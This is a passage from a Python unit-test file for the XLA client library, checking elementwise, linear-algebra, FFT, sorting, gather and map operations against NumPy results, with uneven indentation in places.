c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
ops.Ceil(ops.Constant(c, arr))
self._ExecuteAndCompareClose(c, expected=[np.ceil(arr)])
def testAbs(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, -12.1, 2.4, -1.])
ops.Abs(ops.Constant(c, arr))
self._ExecuteAndCompareClose(c, expected=[np.abs(arr)])
def testTanhF32(self):
c = self._NewComputation()
arr = NumpyArrayF32([-0.2, 3.3, 12.1, 0.1, 0.0001])
ops.Tanh(ops.Constant(c, arr))
self._ExecuteAndCompareClose(c, expected=[np.tanh(arr)])
  def testTanhF64(self):
    """Elementwise Tanh on float64 matches np.tanh to a tight tolerance."""
    if self.backend.platform == "tpu":
      self.skipTest("TPU doesn't support 64bit tanh")
    c = self._NewComputation()
    arr = NumpyArrayF64([-0.2, 3.3, 12.1, 0.1, 0.0001])
    ops.Tanh(ops.Constant(c, arr))
    # float64 allows a much tighter tolerance than the default.
    self._ExecuteAndCompareClose(c, expected=[np.tanh(arr)], rtol=1e-12)
  def testTranspose(self):
    """Transpose matches np.transpose across permutations and memory layouts."""

    def _TransposeAndTest(array, permutation):
      # Builds a one-op computation and compares against np.transpose.
      c = self._NewComputation()
      ops.Transpose(ops.Constant(c, array), permutation)
      expected = np.transpose(array, permutation)
      self._ExecuteAndCompareClose(c, expected=[expected])

    _TransposeAndTest(NumpyArrayF32([[1, 2, 3], [4, 5, 6]]), [0, 1])
    _TransposeAndTest(NumpyArrayF32([[1, 2, 3], [4, 5, 6]]), [1, 0])
    _TransposeAndTest(NumpyArrayF32([[1, 2], [4, 5]]), [0, 1])
    _TransposeAndTest(NumpyArrayF32([[1, 2], [4, 5]]), [1, 0])
    arr = np.random.RandomState(0).randn(2, 3, 4).astype(np.float32)
    for permutation in itertools.permutations(range(arr.ndim)):
      _TransposeAndTest(arr, permutation)
      # Also exercise a column-major (Fortran-order) input layout.
      _TransposeAndTest(np.asfortranarray(arr), permutation)
def testEq(self):
c = self._NewComputation()
ops.Eq(
ops.Constant(c, NumpyArrayS32([1, 2, 3, 4])),
ops.Constant(c, NumpyArrayS32([4, 2, 3, 1])))
self._ExecuteAndCompareExact(c, expected=[[False, True, True, False]])
  def testNe(self):
    """Elementwise inequality, for int32 and for float32 with NaNs."""
    c = self._NewComputation()
    ops.Ne(
        ops.Constant(c, NumpyArrayS32([1, 2, 3, 4])),
        ops.Constant(c, NumpyArrayS32([4, 2, 3, 1])))
    self._ExecuteAndCompareExact(c, expected=[[True, False, False, True]])
    # Float case: NaN != anything (including NaN) and -0.0 == 0.0 under
    # IEEE-754 semantics. A second root op is added to the same builder.
    ops.Ne(
        ops.Constant(c, NumpyArrayF32([-2.0, 0.0,
                                       float("nan"),
                                       float("nan")])),
        ops.Constant(c, NumpyArrayF32([2.0, -0.0, 1.0,
                                       float("nan")])))
    self._ExecuteAndAssertWith(
        np.testing.assert_allclose,
        c, (),
        expected=[[True, False, True, True]])
def testGt(self):
c = self._NewComputation()
ops.Gt(
ops.Constant(c, NumpyArrayS32([1, 2, 3, 4, 9])),
ops.Constant(c, NumpyArrayS32([1, 0, 2, 7, 12])))
self._ExecuteAndCompareExact(
c, expected=[[False, True, True, False, False]])
def testGe(self):
c = self._NewComputation()
ops.Ge(
ops.Constant(c, NumpyArrayS32([1, 2, 3, 4, 9])),
ops.Constant(c, NumpyArrayS32([1, 0, 2, 7, 12])))
self._ExecuteAndCompareExact(
c, expected=[[True, True, True, False, False]])
def testLt(self):
c = self._NewComputation()
ops.Lt(
ops.Constant(c, NumpyArrayS32([1, 2, 3, 4, 9])),
ops.Constant(c, NumpyArrayS32([1, 0, 2, 7, 12])))
self._ExecuteAndCompareExact(
c, expected=[[False, False, False, True, True]])
def testLe(self):
c = self._NewComputation()
ops.Le(
ops.Constant(c, NumpyArrayS32([1, 2, 3, 4, 9])),
ops.Constant(c, NumpyArrayS32([1, 0, 2, 7, 12])))
self._ExecuteAndCompareExact(
c, expected=[[True, False, False, True, True]])
def testMax(self):
c = self._NewComputation()
ops.Max(
ops.Constant(c, NumpyArrayF32([1.0, 2.0, 3.0, 4.0, 9.0])),
ops.Constant(c, NumpyArrayF32([1.0, 0.0, 2.0, 7.0, 12.0])))
self._ExecuteAndCompareExact(c, expected=[[1.0, 2.0, 3.0, 7.0, 12.0]])
  def testMaxExplicitBroadcastDim0(self):
    """Max broadcasts the 1D operand along dimension 0 of the 2D operand."""
    c = self._NewComputation()
    ops.Max(
        ops.Constant(c, NumpyArrayF32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
        ops.Constant(c, NumpyArrayF32([3, 4, 5])),
        broadcast_dimensions=(0,))
    self._ExecuteAndCompareExact(
        c, expected=[[[3, 3, 3], [4, 5, 6], [7, 8, 9]]])
  def testMaxExplicitBroadcastDim1(self):
    """Max broadcasts the 1D operand along dimension 1 of the 2D operand."""
    c = self._NewComputation()
    ops.Max(
        ops.Constant(c, NumpyArrayF32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
        ops.Constant(c, NumpyArrayF32([3, 4, 5])),
        broadcast_dimensions=(1,))
    self._ExecuteAndCompareExact(
        c, expected=[[[3, 4, 5], [4, 5, 6], [7, 8, 9]]])
def testMin(self):
c = self._NewComputation()
ops.Min(
ops.Constant(c, NumpyArrayF32([1.0, 2.0, 3.0, 4.0, 9.0])),
ops.Constant(c, NumpyArrayF32([1.0, 0.0, 2.0, 7.0, 12.0])))
self._ExecuteAndCompareExact(c, expected=[[1.0, 0.0, 2.0, 4.0, 9.0]])
  def testPad(self):
    """Pad with a (low, high, interior) configuration per dimension."""
    c = self._NewComputation()
    ops.Pad(
        ops.Constant(c, NumpyArrayF32([[1.0, 2.0], [3.0, 4.0]])),
        ops.Constant(c, NumpyArrayF32(0.0)),
        xla_client.make_padding_config([(1, 2, 1), (0, 1, 0)]))
    self._ExecuteAndCompareClose(
        c,
        expected=[[[0.0, 0.0, 0.0], [1.0, 2.0, 0.0], [0.0, 0.0, 0.0],
                   [3.0, 4.0, 0.0], [0.0, 0.0, 0.0], [0.0, 0.0, 0.0]]])
  def testPadWithPaddingConfig(self):
    """Pad accepts a hand-built PaddingConfig proto; same result as testPad."""
    c = self._NewComputation()
    padding_config = xla_client.PaddingConfig()
    # Build one PaddingConfigDimension per dim: (low, high, interior).
    for lo, hi, interior in [(1, 2, 1), (0, 1, 0)]:
      dimension = xla_client.PaddingConfigDimension()
      dimension.edge_padding_low = lo
      dimension.edge_padding_high = hi
      dimension.interior_padding = interior
      padding_config.dimensions.append(dimension)
    ops.Pad(
        ops.Constant(c, NumpyArrayF32([[1.0, 2.0], [3.0, 4.0]])),
        ops.Constant(c, NumpyArrayF32(0.0)), padding_config)
    self._ExecuteAndCompareClose(
        c,
        expected=[[[0.0, 0.0, 0.0], [1.0, 2.0, 0.0], [0.0, 0.0, 0.0],
                   [3.0, 4.0, 0.0], [0.0, 0.0, 0.0], [0.0, 0.0, 0.0]]])
def testReshape(self):
c = self._NewComputation()
ops.Reshape(
ops.Constant(c, NumpyArrayS32([[1, 2], [3, 4], [5, 6]])),
dimensions=[0, 1],
new_sizes=[2, 3])
self._ExecuteAndCompareExact(c, expected=[[[1, 2, 3], [4, 5, 6]]])
def testCollapse(self):
c = self._NewComputation()
ops.Collapse(
ops.Constant(c, NumpyArrayS32([[[1, 2], [3, 4]], [[5, 6], [7, 8]]])),
dimensions=[1, 2])
self._ExecuteAndCompareExact(c, expected=[[[1, 2, 3, 4], [5, 6, 7, 8]]])
def testRev(self):
c = self._NewComputation()
ops.Rev(
ops.Constant(c, NumpyArrayS32([[[1, 2], [3, 4]], [[5, 6], [7, 8]]])),
dimensions=[0, 2])
self._ExecuteAndCompareExact(
c, expected=[[[[6, 5], [8, 7]], [[2, 1], [4, 3]]]])
  def testReducePrecision(self):
    """ReducePrecision rounds the mantissa to the requested bit width."""
    c = self._NewComputation()
    ops.ReducePrecision(
        ops.Constant(c, NumpyArrayF32([float.fromhex("0x1.32fffep-3")])),
        # 8 exponent bits and 7 mantissa bits truncate 0x1.32fffep-3 to
        # 0x1.32p-3.
        exponent_bits=8,
        mantissa_bits=7)
    self._ExecuteAndCompareClose(c, expected=[[float.fromhex("0x1.32p-3")]])
def testClampF32(self):
c = self._NewComputation()
ops.Clamp(
ops.Constant(c, NumpyArrayF32(-1)),
ops.Constant(c, NumpyArrayF32([-2, -1, 0, 1, 2, 3])),
ops.Constant(c, NumpyArrayF32(2)))
self._ExecuteAndCompareExact(c, expected=[[-1, -1, 0, 1, 2, 2]])
def testClampS32(self):
c = self._NewComputation()
ops.Clamp(
ops.Constant(c, NumpyArrayS32(-1)),
ops.Constant(c, NumpyArrayS32([-2, -1, 0, 1, 2, 3])),
ops.Constant(c, NumpyArrayS32(2)))
self._ExecuteAndCompareExact(c, expected=[[-1, -1, 0, 1, 2, 2]])
def testSelect(self):
c = self._NewComputation()
ops.Select(
ops.Constant(c, NumpyArrayBool([True, False, False, True, False])),
ops.Constant(c, NumpyArrayS32([1, 2, 3, 4, 5])),
ops.Constant(c, NumpyArrayS32([-1, -2, -3, -4, -5])))
self._ExecuteAndCompareExact(c, expected=[[1, -2, -3, 4, -5]])
def testSlice(self):
c = self._NewComputation()
ops.Slice(
ops.Constant(c, NumpyArrayS32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
[1, 0], [3, 2], [1, 1])
self._ExecuteAndCompareExact(c, expected=[[[4, 5], [7, 8]]])
  def testSliceInDim(self):
    """SliceInDim slices along a single dimension with a stride."""
    c = self._NewComputation()
    # Take column 1 (indices [1, 2) of dimension 1).
    ops.SliceInDim(
        ops.Constant(c, NumpyArrayS32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
        start_index=1,
        limit_index=2,
        stride=1,
        dimno=1)
    self._ExecuteAndCompareExact(c, expected=[[[2], [5], [8]]])
    # Take every other row (indices 0 and 2 of dimension 0).
    ops.SliceInDim(
        ops.Constant(c, NumpyArrayS32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
        start_index=0,
        limit_index=3,
        stride=2,
        dimno=0)
    self._ExecuteAndCompareExact(c, expected=[[[1, 2, 3], [7, 8, 9]]])
  def testDynamicSlice(self):
    """DynamicSlice takes a 2x2 window starting at runtime indices (1, 0)."""
    c = self._NewComputation()
    ops.DynamicSlice(
        ops.Constant(c, NumpyArrayS32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
        [ops.Constant(c, NumpyArrayS32([1, 0]))], [2, 2])
    self._ExecuteAndCompareExact(c, expected=[[[4, 5], [7, 8]]])
  def testDynamicUpdateSlice(self):
    """DynamicUpdateSlice writes a 2x2 update at runtime indices (1, 1)."""
    c = self._NewComputation()
    ops.DynamicUpdateSlice(
        ops.Constant(c, NumpyArrayS32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
        ops.Constant(c, NumpyArrayS32([[1, 2], [3, 4]])),
        [ops.Constant(c, NumpyArrayS32([1, 1]))])
    self._ExecuteAndCompareExact(
        c, expected=[[[1, 2, 3], [4, 1, 2], [7, 3, 4]]])
  def testTuple(self):
    """A tuple root is returned as one Python value per tuple element."""
    c = self._NewComputation()
    ops.Tuple(c, [
        ops.Constant(c, np.int32(42)),
        ops.Constant(c, NumpyArrayF32([1.0, 2.0])),
        ops.Constant(c, NumpyArrayBool([True, False, False, True]))
    ])
    result = xla_client.execute_with_python_values(
        self.backend.compile(c.build()), (), backend=self.backend)
    self.assertLen(result, 3)
    np.testing.assert_equal(result[0], 42)
    np.testing.assert_allclose(result[1], [1.0, 2.0])
    np.testing.assert_equal(result[2], [True, False, False, True])
def testGetTupleElement(self):
  """GetTupleElement(t, 1) extracts the second element of a 3-tuple."""
  c = self._NewComputation()
  ops.GetTupleElement(
      ops.Tuple(c, [
          ops.Constant(c, np.int32(42)),
          ops.Constant(c, NumpyArrayF32([1.0, 2.0])),
          ops.Constant(c, NumpyArrayBool([True, False, False, True]))
      ]), 1)
  self._ExecuteAndCompareClose(c, expected=[[1.0, 2.0]])
def testBroadcast(self):
  """Broadcast prepends a dimension of size 3, replicating the vector."""
  c = self._NewComputation()
  ops.Broadcast(
      ops.Constant(c, NumpyArrayS32([10, 20, 30, 40])), sizes=(3,))
  self._ExecuteAndCompareExact(
      c, expected=[[[10, 20, 30, 40], [10, 20, 30, 40], [10, 20, 30, 40]]])
def testBroadcastInDim(self):
  """BroadcastInDim maps the input dim onto dim 0 vs dim 1 of a 2x2 output."""
  c = self._NewComputation()
  ops.BroadcastInDim(ops.Constant(c, NumpyArrayS32([1, 2])), [2, 2], [0])
  self._ExecuteAndCompareExact(c, expected=[[[1, 1], [2, 2]]])
  ops.BroadcastInDim(ops.Constant(c, NumpyArrayS32([1, 2])), [2, 2], [1])
  self._ExecuteAndCompareExact(c, expected=[[[1, 2], [1, 2]]])
def testRngNormal(self):
  """RngNormal(mu=0, sigma=1) produces distinct f32 values of the right shape."""
  shape = (2, 3)
  c = self._NewComputation()
  ops.RngNormal(
      ops.Constant(c, NumpyArrayF32(0.)),
      ops.Constant(c, NumpyArrayF32(1.)),
      shape=xla_client.Shape.array_shape(xla_client.PrimitiveType.F32,
                                         shape))
  result = xla_client.execute_with_python_values(
      self.backend.compile(c.build()), (), backend=self.backend)
  # since the result is random, we just check shape and uniqueness
  self.assertLen(result, 1)
  self.assertEqual(result[0].shape, shape)
  self.assertLen(np.unique(result[0]), np.prod(shape))
def testRngUniformF32(self):
  """RngUniform over f32 stays in [lo, hi) with distinct values."""
  lo, hi = 2., 4.
  shape = (2, 3)
  c = self._NewComputation()
  ops.RngUniform(
      ops.Constant(c, NumpyArrayF32(lo)),
      ops.Constant(c, NumpyArrayF32(hi)),
      shape=xla_client.Shape.array_shape(xla_client.PrimitiveType.F32,
                                         shape))
  result = xla_client.execute_with_python_values(
      self.backend.compile(c.build()), (), backend=self.backend)
  # since the result is random, we just check shape, uniqueness, and range
  self.assertLen(result, 1)
  self.assertEqual(result[0].shape, shape)
  self.assertLen(np.unique(result[0]), np.prod(shape))
  self.assertTrue(np.all(lo <= result[0]))
  self.assertTrue(np.all(result[0] < hi))
def testRngUniformS32(self):
  """RngUniform over s32 yields int32 values in [lo, hi)."""
  lo, hi = 2, 4
  shape = (2, 3)
  c = self._NewComputation()
  ops.RngUniform(
      ops.Constant(c, NumpyArrayS32(lo)),
      ops.Constant(c, NumpyArrayS32(hi)),
      shape=xla_client.Shape.array_shape(xla_client.PrimitiveType.S32,
                                         shape))
  result = xla_client.execute_with_python_values(
      self.backend.compile(c.build()), (), backend=self.backend)
  # since the result is random, we just check shape, integrality, and range
  self.assertLen(result, 1)
  self.assertEqual(result[0].shape, shape)
  self.assertEqual(result[0].dtype, np.int32)
  self.assertTrue(np.all(lo <= result[0]))
  self.assertTrue(np.all(result[0] < hi))
def testCholesky(self):
  """Cholesky of l @ l.T recovers the lower-triangular factor l."""
  l = np.array([[4, 0, 0, 0], [6, 5, 0, 0], [2, 14, 16, 0], [3, 6, 1, 4]],
               dtype=np.float32)
  c = self._NewComputation()
  # np.tril keeps only the lower triangle Cholesky is defined to read.
  ops.Cholesky(ops.Constant(c, np.tril(np.dot(l, l.T))))
  self._ExecuteAndCompareClose(c, expected=[l], rtol=1e-4)
def testSort(self):
  """Stable Sort along the default (last) dimension sorts each row."""
  keys = np.array([[2, 4, 1, 3], [3, 1, 4, 2]], dtype=np.float32)
  c = self._NewComputation()
  ops.Sort(c, [ops.Constant(c, keys)], is_stable=True)
  self._ExecuteAndCompareClose(
      c,
      expected=[np.array([[1, 2, 3, 4], [1, 2, 3, 4]], dtype=np.float32)])
def testSortKeyVal(self):
  """Variadic Sort along dim 0 reorders the values operand with the keys."""
  keys = np.array([[2, 4, 1, 3], [3, 1, 4, 2]], dtype=np.float32)
  values = np.array([[0, 1, 2, 3], [4, 5, 6, 7]], dtype=np.int32)
  c = self._NewComputation()
  ops.Sort(c, (ops.Constant(c, keys), ops.Constant(c, values)), dimension=0)
  result = xla_client.execute_with_python_values(
      self.backend.compile(c.build()), (), backend=self.backend)
  self.assertLen(result, 2)
  np.testing.assert_allclose(result[0], [[2, 1, 1, 2], [3, 4, 4, 3]])
  np.testing.assert_equal(result[1], [[0, 5, 2, 7], [4, 1, 6, 3]])
def testSortCustomComparator(self):
  """Sort with a custom comparator: ascending keys, ties broken by larger value."""
  # Comparator over (key_a, key_b, val_a, val_b):
  # key_a < key_b, or keys equal and val_a > val_b.
  b = self._NewComputation("comparator")
  p0 = ops.Parameter(b, 0, xla_client.shape_from_pyval(NumpyArrayF32(0)))
  q0 = ops.Parameter(b, 1, xla_client.shape_from_pyval(NumpyArrayF32(0)))
  p1 = ops.Parameter(b, 2, xla_client.shape_from_pyval(NumpyArrayS32(0)))
  q1 = ops.Parameter(b, 3, xla_client.shape_from_pyval(NumpyArrayS32(0)))
  ops.Or(ops.Lt(p0, q0), ops.And(ops.Eq(p0, q0), ops.Gt(p1, q1)))
  comparator = b.build()
  keys = np.array([[2, 3, 1, 3], [3, 1, 2, 2]], dtype=np.float32)
  values = np.array([[0, 1, 2, 3], [4, 5, 6, 7]], dtype=np.int32)
  c = self._NewComputation()
  ops.Sort(
      c, (ops.Constant(c, keys), ops.Constant(c, values)),
      dimension=1,
      comparator=comparator)
  result = xla_client.execute_with_python_values(
      self.backend.compile(c.build()), (), backend=self.backend)
  self.assertLen(result, 2)
  np.testing.assert_allclose(result[0], [[1, 2, 3, 3], [1, 2, 2, 3]])
  np.testing.assert_equal(result[1], [[2, 0, 3, 1], [5, 7, 6, 4]])
def testQR(self):
  """QR decomposition reconstructs the input: q @ r == a."""
  a = np.array([[4, 6, 8, 10], [6, 45, 54, 63], [8, 54, 146, 166],
                [10, 63, 166, 310]],
               dtype=np.float32)
  c = self._NewComputation()
  ops.Tuple(c, ops.QR(ops.Constant(c, a), full_matrices=True))
  q, r = self._Execute(c, ())
  np.testing.assert_allclose(np.dot(q, r), a, rtol=1e-4)
def testEigh(self):
  """Eigh on a symmetrized matrix builds; result check is disabled (b/129396575)."""
  a = np.array([[4, 6, 8, 10], [6, 45, 54, 63], [8, 54, 146, 166],
                [10, 63, 166, 310]],
               dtype=np.float32)
  # Symmetrize so the eigendecomposition is well-defined.
  a = (a + a.T) / 2
  c = self._NewComputation()
  ops.Tuple(c, ops.Eigh(ops.Constant(c, a), lower=True))
  # TODO(b/129396575): Turn this test back on when it passes without
  # fastmath.
  # v, w = self._Execute(c, ())
  # self.assertLess(np.linalg.norm(np.dot(a, v) - w * v), 1e-3)
def testSVD(self):
  """SVD factors reconstruct the input: (u * d) @ v.T ~= a."""
  a = np.array([[4, 6, 8, 10], [6, 45, 54, 63], [8, 54, 146, 166],
                [10, 63, 166, 310]],
               dtype=np.float32)
  c = self._NewComputation()
  ops.Tuple(c, ops.SVD(ops.Constant(c, a)))
  u, d, v = self._Execute(c, ())
  self.assertLess(np.linalg.norm(a - np.matmul(u * d, v.T)), 1e-3)
def testTriangularSolve(self):
  """TriangularSolve solves x @ a^T = b for a lower-triangular a."""
  a_vals = np.array(
      [[2, 0, 0, 0], [3, 6, 0, 0], [4, 7, 9, 0], [5, 8, 10, 11]],
      dtype=np.float32)
  b_vals = np.array([[1, 2, 3, 4], [5, 6, 7, 8], [9, 10, 11, 12]],
                    dtype=np.float32)
  c = self._NewComputation()
  ops.TriangularSolve(
      ops.Constant(c, a_vals),
      ops.Constant(c, b_vals),
      left_side=False,
      lower=True,
      transpose_a=ops.TriangularSolveOptions_Transpose.TRANSPOSE,
      unit_diagonal=False)
  self._ExecuteAndCompareClose(
      c,
      expected=[
          np.array([
              [0.5, 0.08333334, 0.04629629, 0.03367003],
              [2.5, -0.25, -0.1388889, -0.1010101],
              [4.5, -0.58333331, -0.32407406, -0.23569024],
          ],
                   dtype=np.float32)
      ],
      rtol=1e-4)
def testIsConstant(self):
  """is_constant is true for constant-only subgraphs, false once a Parameter joins."""
  c = self._NewComputation()
  a = ops.Constant(c, np.int32(3))
  b = ops.Constant(c, np.int32(1))
  x = ops.Parameter(c, 0, xla_client.shape_from_pyval(NumpyArrayS32(0)))
  const_expr = ops.Sub(b, a)
  non_const_expr = ops.Mul(const_expr, x)
  self.assertTrue(c.is_constant(const_expr))
  self.assertFalse(c.is_constant(non_const_expr))
def testGather(self):
  """Gather with 2D start-index tuples picks single elements from a 3x3 array."""
  a = np.arange(9).astype(np.int32).reshape((3, 3))
  # Each innermost pair in `indices` is a full (row, col) start index.
  indices = np.array([[[0, 2], [2, 1]], [[1, 2], [2, 0]]], dtype=np.int32)
  dnums = xla_client.GatherDimensionNumbers()
  dnums.offset_dims.append(1)
  dnums.offset_dims.append(2)
  dnums.start_index_map.append(0)
  dnums.start_index_map.append(1)
  dnums.index_vector_dim = 2
  c = self._NewComputation()
  ops.Gather(
      ops.Constant(c, a),
      ops.Constant(c, indices),
      dnums,
      slice_sizes=[1, 1])
  g, = self._Execute(c, ())
  expected = np.array([[[[2, 7]]], [[[5, 6]]]], dtype=np.int32)
  np.testing.assert_allclose(g, expected, rtol=1e-4)
def testFft(self):
  """FFT/IFFT/RFFT/IRFFT over the last 3 axes match the numpy equivalents."""
  if self.backend.platform == "tpu":
    self.skipTest("TPU only supports 1D FFT")
  shape = [2, 3, 4, 5]
  rng = np.random.RandomState(0)
  a = rng.randn(*shape) + 1.0j * rng.randn(*shape)
  a = a.astype(np.complex64)
  # FFT
  c = self._NewComputation()
  ops.Fft(ops.Constant(c, a), xla_client.FftType.FFT, shape[-3:])
  self._ExecuteAndCompareClose(
      c, expected=[np.fft.fftn(a, axes=(1, 2, 3))], rtol=1e-4)
  # IFFT
  c = self._NewComputation()
  ops.Fft(ops.Constant(c, a), xla_client.FftType.IFFT, shape[-3:])
  self._ExecuteAndCompareClose(
      c, expected=[np.fft.ifftn(a, axes=(1, 2, 3))], rtol=1e-4)
  # RFFT
  b = rng.randn(*shape).astype(np.float32)
  c = self._NewComputation()
  ops.Fft(ops.Constant(c, b), xla_client.FftType.RFFT, shape[-3:])
  self._ExecuteAndCompareClose(
      c, expected=[np.fft.rfftn(b, axes=(1, 2, 3))], rtol=1e-4)
  # IRFFT
  c = self._NewComputation()
  ops.Fft(ops.Constant(c, a), xla_client.FftType.IRFFT, [3, 4, 8])
  self._ExecuteAndCompareClose(
      c, expected=[np.fft.irfftn(a, axes=(1, 2, 3))], rtol=1e-4)
def testNextAfter(self):
  """NextAfter steps each element one ULP toward its paired target."""
  c = self._NewComputation()
  ops.NextAfter(
      ops.Constant(c, np.array([1, 2], dtype=np.float32)),
      ops.Constant(c, np.array([2, 1], dtype=np.float32)))
  out, = self._Execute(c, ())
  eps = np.finfo(np.float32).eps
  # One ULP above 1.0 is 1+eps; one ULP below 2.0 is 2-eps.
  np.testing.assert_equal(
      np.array([eps + 1, 2 - eps], dtype=np.float32), out)
@parameterized.named_parameters({
    "testcase_name": "_{}".format(dtype.__name__),
    "dtype": dtype,
} for dtype in float_dtypes)
def testRegularizedIncompleteBeta(self, dtype):
  """RegularizedIncompleteBeta(a, b, x) matches precomputed reference values."""
  x = np.array([0.53787335, 0.24015466, 0.47494545, 0.13567594, 0.95114538],
               dtype=dtype)
  a = np.array([0.00753073, 0.34813385, 0.30485708, 1.29298632, 0.51472606],
               dtype=dtype)
  b = np.array([0.55688389, 0.59794214, 0.42661022, 1.59748339, 0.95047677],
               dtype=dtype)
  c = self._NewComputation()
  ops.RegularizedIncompleteBeta(
      ops.Constant(c, a), ops.Constant(c, b), ops.Constant(c, x))
  expected = np.array(
      [0.98923271, 0.48575411, 0.57952568, 0.12579775, 0.96989155])
  # Loose tolerance since the test runs over low-precision float dtypes too.
  self._ExecuteAndCompareClose(c, expected=[expected], rtol=2e-2)
tests.append(SingleOpTest)
class EmbeddedComputationsTest(ComputationTest):
  """Tests for XLA graphs with embedded computations (such as maps).

  The `_Create*Computation` helpers build small sub-computations that the
  tests embed into Map/Reduce/While/Conditional/etc. ops.
  """

  def _CreateConstantComputation(self, in_dtype, out_dtype):
    """Computation (A) -> B that returns a constant 1 for any input."""
    c = self._NewComputation("constant_{}_{}_one".format(
        in_dtype.__name__, out_dtype.__name__))
    # The parameter is declared but deliberately unused; the constant below
    # becomes the computation's root.
    ops.Parameter(c, 0,
                  xla_client.shape_from_pyval(np.array(0, dtype=in_dtype)))
    ops.Constant(c, out_dtype(1))
    return c.build()

  def _CreateMulBy2Computation(self, dtype):
    """Computation (dtype) -> dtype that multiplies its parameter by 2."""
    # NOTE(review): the debug name says "f32" but the helper is used for any
    # float dtype; the name is a label only and does not affect behavior.
    c = self._NewComputation("mul_f32_by2")
    ops.Mul(
        ops.Parameter(
            c, 0,
            xla_client.shape_from_pyval(np.array(
                0, dtype=dtype)).with_major_to_minor_layout_if_absent()),
        ops.Constant(c, dtype(2.0)))
    return c.build()

  def _CreateMulF32ByParamComputation(self):
    """Computation (f32) -> f32 that multiplies one parameter by the other."""
    c = self._NewComputation("mul_f32_by_param")
    ops.Mul(
        ops.Parameter(c, 0, xla_client.shape_from_pyval(NumpyArrayF32(0))),
        ops.Parameter(c, 1, xla_client.shape_from_pyval(NumpyArrayF32(0))))
    return c.build()

  def _CreateBinaryAddComputation(self, dtype):
    """Computation (dtype, dtype) -> dtype that adds its two parameters."""
    c = self._NewComputation("add_param0_by_param1")
    shape = xla_client.shape_from_pyval(np.array(0, dtype=dtype))
    shape = shape.with_major_to_minor_layout_if_absent()
    ops.Add(ops.Parameter(c, 0, shape), ops.Parameter(c, 1, shape))
    return c.build()

  def _CreateBinaryGeComputation(self, dtype):
    """Computation (dtype, dtype) -> bool that tests param0 >= param1."""
    # Fixed misleading debug name: this computation builds Ge, not Lt, as
    # its docstring states (was "param0_lt_param1").
    c = self._NewComputation("param0_ge_param1")
    shape = xla_client.shape_from_pyval(np.array(0, dtype=dtype))
    shape = shape.with_major_to_minor_layout_if_absent()
    ops.Ge(ops.Parameter(c, 0, shape), ops.Parameter(c, 1, shape))
    return c.build()

  def _MakeSample3DArray(self, dtype):
    """Returns a fixed (4, 2, 3) array used by the 3D reduction tests."""
    return np.array([[[1, 2, 3], [4, 5, 6]], [[1, 2, 3], [4, 5, 6]],
                     [[1, 2, 3], [4, 5, 6]], [[1, 2, 3], [4, 5, 6]]],
                    dtype=dtype)

  @parameterized.named_parameters({
      "testcase_name": "_{}".format(dtype.__name__),
      "dtype": dtype,
  } for dtype in float_dtypes)
  def testCall(self, dtype):
    """Call embeds the mul-by-2 computation: 5 -> 10."""
    c = self._NewComputation()
    ops.Call(
        c,
        self._CreateMulBy2Computation(dtype),
        operands=(ops.Constant(c, dtype(5.0)),))
    self._ExecuteAndCompareClose(c, expected=[10.0])

  @parameterized.named_parameters({
      "testcase_name": "_{}_{}".format(in_dtype.__name__, out_dtype.__name__),
      "in_dtype": in_dtype,
      "out_dtype": out_dtype,
  } for in_dtype, out_dtype in [[np.float32, np.int32]])
  def testMapEachElementToConstant(self, in_dtype, out_dtype):
    """Map with a constant-one computation yields all ones (with dtype cast)."""
    c = self._NewComputation()
    ops.Map(c,
            [ops.Constant(c, np.array([1.0, 2.0, 3.0, 4.0], dtype=in_dtype))],
            self._CreateConstantComputation(in_dtype, out_dtype), [0])
    self._ExecuteAndCompareExact(c, expected=[[1, 1, 1, 1]])

  @parameterized.named_parameters({
      "testcase_name": "_{}".format(dtype.__name__),
      "dtype": dtype,
  } for dtype in float_dtypes)
  def testMapMulBy2(self, dtype):
    """Map with the mul-by-2 computation doubles each element."""
    if dtype == np.float64 and self.backend.platform == "tpu":
      self.skipTest("TPU doesn't support float64")
    c = self._NewComputation()
    ops.Map(c, [ops.Constant(c, np.array([1.0, 2.0, 3.0, 4.0], dtype=dtype))],
            self._CreateMulBy2Computation(dtype), [0])
    self._ExecuteAndCompareClose(c, expected=[[2.0, 4.0, 6.0, 8.0]])

  @parameterized.named_parameters({
      "testcase_name": "_{}".format(dtype.__name__),
      "dtype": dtype,
  } for dtype in float_dtypes)
  def testSimpleMapChain(self, dtype):
    """Chained maps: constant-one then mul-by-2 yields all twos."""
    if dtype == np.float64 and self.backend.platform == "tpu":
      self.skipTest("TPU doesn't support float64")
    # Chains a map of constant-out with a map of mul-by-2
    c = self._NewComputation()
    const = ops.Map(
        c, [ops.Constant(c, np.array([1.0, 2.0, 3.0, 4.0], dtype=dtype))],
        self._CreateConstantComputation(dtype, dtype), [0])
    ops.Map(c, [const], self._CreateMulBy2Computation(dtype), [0])
    self._ExecuteAndCompareClose(c, expected=[[2.0, 2.0, 2.0, 2.0]])

  # TODO(b/154752816): bfloat16 crashes in evaluator.
  @parameterized.named_parameters({
      "testcase_name": "_{}".format(dtype.__name__),
      "dtype": dtype,
  } for dtype in float_dtypes if dtype != bfloat16)
  def testDivVectorsWithMap(self, dtype):
    """Map over two operands with an elementwise-division computation."""

    def DivComputation():
      c = self._NewComputation("div_param0_by_param1")
      shape = xla_client.shape_from_pyval(np.array(0, dtype=dtype))
      ops.Div(ops.Parameter(c, 0, shape), ops.Parameter(c, 1, shape))
      return c.build()

    c = self._NewComputation()
    ops.Map(c, (ops.Constant(c, np.array([1.0, 2.0, 3.0, 4.0], dtype=dtype)),
                ops.Constant(c, np.array([5.0, 5.0, 4.0, 4.0], dtype=dtype))),
            DivComputation(), [0])
    self._ExecuteAndCompareClose(
        c, expected=[[0.2, 0.4, 0.75, 1.0]], rtol=1e-3)

  @parameterized.named_parameters({
      "testcase_name": "_{}".format(dtype.__name__),
      "dtype": dtype,
  } for dtype in float_dtypes)
  def testSelectAndScatter(self, dtype):
    """SelectAndScatter with Ge select and Add scatter over 2x1 windows."""
    if dtype == np.float64 and self.backend.platform == "tpu":
      self.skipTest("TPU doesn't support float64")
    c = self._NewComputation()
